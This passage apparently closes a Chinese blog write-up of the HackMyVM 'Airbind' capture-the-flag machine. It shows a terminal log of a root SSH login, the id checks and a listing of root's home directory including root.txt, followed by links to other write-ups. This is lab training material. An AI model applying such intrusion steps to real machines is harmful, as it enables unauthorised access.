root@ubuntu:~# ssh 192.168.10.1
Linux airbind 6.1.0-18-amd64 #1 SMP PREEMPT_DYNAMIC Debian 6.1.76-1 (2024-02-01) x86_64

The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.

Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
root@airbind:~# whoami;id
root
uid=0(root) gid=0(root) groupes=0(root)
root@airbind:~# ls -la
total 32
drwx------  5 root root 4096 21 mai    2024 .
drwxr-xr-x 18 root root 4096  1 avril  2024 ..
lrwxrwxrwx  1 root root    9  9 mars   2024 .bash_history -> /dev/null
-rw-r--r--  1 root root  571 10 avril  2021 .bashrc
drwx------  2 root root 4096  2 avril  2024 .config
drwxr-xr-x  3 root root 4096  1 avril  2024 .local
-rw-r--r--  1 root root  161  9 juil.  2019 .profile
-rwx------  1 root root   33  2 avril  2024 root.txt
drwx------  2 root root 4096  2 avril  2024 .ssh

同样拿到了shell,帅的一批!

参考

https://youtu.be/OffNnj5RQJQ?si=Gzh4kVJqmL0GT0FZ

https://github.com/HosseinVampire/Writeups/blob/main/Hackmyvm/Machines/Airbind/Ctf.md

https://vishal-chandak.medium.com/hackmyvm-airbind-2d776bc55fe1

https://blog.csdn.net/tanbinn/article/details/139784974

https://www.bilibili.com/video/BV1j442197dv/

暂无评论

发送评论 编辑评论


				
|´・ω・)ノ
ヾ(≧∇≦*)ゝ
(☆ω☆)
(╯‵□′)╯︵┴─┴
 ̄﹃ ̄
(/ω\)
∠( ᐛ 」∠)_
(๑•̀ㅁ•́ฅ)
→_→
୧(๑•̀⌄•́๑)૭
٩(ˊᗜˋ*)و
(ノ°ο°)ノ
(´இ皿இ`)
⌇●﹏●⌇
(ฅ´ω`ฅ)
(╯°A°)╯︵○○○
φ( ̄∇ ̄o)
ヾ(´・ ・`。)ノ"
( ง ᵒ̌皿ᵒ̌)ง⁼³₌₃
(ó﹏ò。)
Σ(っ °Д °;)っ
( ,,´・ω・)ノ"(´っω・`。)
╮(╯▽╰)╭
o(*////▽////*)q
>﹏<
( ๑´•ω•) "(ㆆᴗㆆ)
😂
😀
😅
😊
🙂
🙃
😌
😍
😘
😜
😝
😏
😒
🙄
😳
😡
😔
😫
😱
😭
💩
👻
🙌
🖕
👍
👫
👬
👭
🌚
🌝
🙈
💊
😶
🙏
🍦
🍉
😣
Source: github.com/k4yt3x/flowerhd
颜文字
Emoji
小恐龙
花!
上一篇
下一篇